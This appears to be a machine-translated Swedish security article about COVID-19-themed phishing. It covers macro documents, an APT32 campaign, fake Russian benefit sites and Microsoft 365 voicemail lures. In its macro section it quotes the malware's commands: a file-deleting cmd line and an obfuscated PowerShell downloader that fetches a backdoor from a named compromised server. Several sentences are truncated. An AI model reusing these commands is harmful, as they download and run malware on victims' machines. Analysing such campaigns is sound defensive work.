Angripare fortsätter att utnyttja COVID-19-ämnet och skapar fler och fler hot för användare som är mycket intresserade av allt som har med epidemin att göra. I
Kom ihåg in
Vill du ha ett gratis test för COVID-19?
Ett annat viktigt exempel på nätfiske med coronavirus-tema var
Att övertyga de flesta användare att aktivera makron var också enkelt. För att göra detta användes ett standardknep: för att fylla i frågeformuläret måste du först aktivera makron, vilket innebär att du måste köra ett VBA-skript.
Som du kan se är VBA-skriptet speciellt maskerat från antivirus.
Windows har en väntefunktion där programmet väntar /T <sekunder> innan det accepterar standardsvaret "Ja". I vårt fall väntade skriptet 65 sekunder innan temporära filer raderades:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Och i väntan laddades skadlig programvara ner. Ett speciellt PowerShell-skript lanserades för detta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Efter avkodning av Base64-värdet laddar PowerShell-skriptet ned bakdörren som finns på den tidigare hackade webbservern från Tyskland:
http://automatischer-staubsauger.com/feature/777777.png
och sparar den under namnet:
C:UsersPublictmpdirfile1.exe
Mapp ‘C:UsersPublictmpdir’
raderas när filen 'tmps1.bat' som innehåller kommandot körs cmd /c mkdir ""C:UsersPublictmpdir"".
Riktad attack mot statliga myndigheter
Dessutom rapporterade FireEye-analytiker nyligen en riktad APT32-attack riktad mot regeringsstrukturer i Wuhan, såväl som det kinesiska ministeriet för krishantering. En av de distribuerade RTF:erna innehöll en länk till en artikel i New York Times med titeln
Intressant nog, vid tidpunkten för upptäckten upptäckte inget av antivirusen denna instans, enligt Virustotal.
När officiella webbplatser är nere
Det mest slående exemplet på en nätfiskeattack inträffade i Ryssland häromdagen. Anledningen till detta var utnämningen av en efterlängtad förmån för barn i åldrarna 3 till 16 år. När starten för att acceptera ansökningar tillkännagavs den 12 maj 2020 rusade miljoner till statens webbplats för den efterlängtade hjälpen och slog ner portalen inte värre än en professionell DDoS-attack. När presidenten sa att "statliga tjänster inte kunde hantera flödet av ansökningar" började folk prata online om lanseringen av en alternativ sida för att acceptera ansökningar.
Problemet är att flera sajter började fungera samtidigt, och medan en, den riktiga på posobie16.gosuslugi.ru, faktiskt accepterar ansökningar, mer
Kollegor från SearchInform hittade cirka 30 nya bedrägliga domäner i .ru-zonen. Infosecurity och Softline Company har spårat mer än 70 liknande falska webbplatser för statliga tjänster sedan början av april. Deras skapare manipulerar välbekanta symboler och använder även kombinationer av orden gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, och så vidare.
Hype och social ingenjörskonst
Alla dessa exempel bekräftar bara att angripare framgångsrikt tjänar pengar på ämnet coronavirus. Och ju högre social spänning är och ju mer oklara frågor, desto större chans har bedragare att stjäla viktig data, tvinga människor att ge upp sina pengar på egen hand eller helt enkelt hacka fler datorer.
Och med tanke på att pandemin har tvingat potentiellt oförberedda människor att arbeta hemifrån i massor, är inte bara personlig data utan även företagsdata i fara. Till exempel har nyligen Microsoft 365 (tidigare Office 365) användare också utsatts för en nätfiskeattack. Människor fick massiva "missade" röstmeddelanden som bilagor till brev. Men filerna var faktiskt en HTML-sida som skickade offren för attacken till
Källa: will.com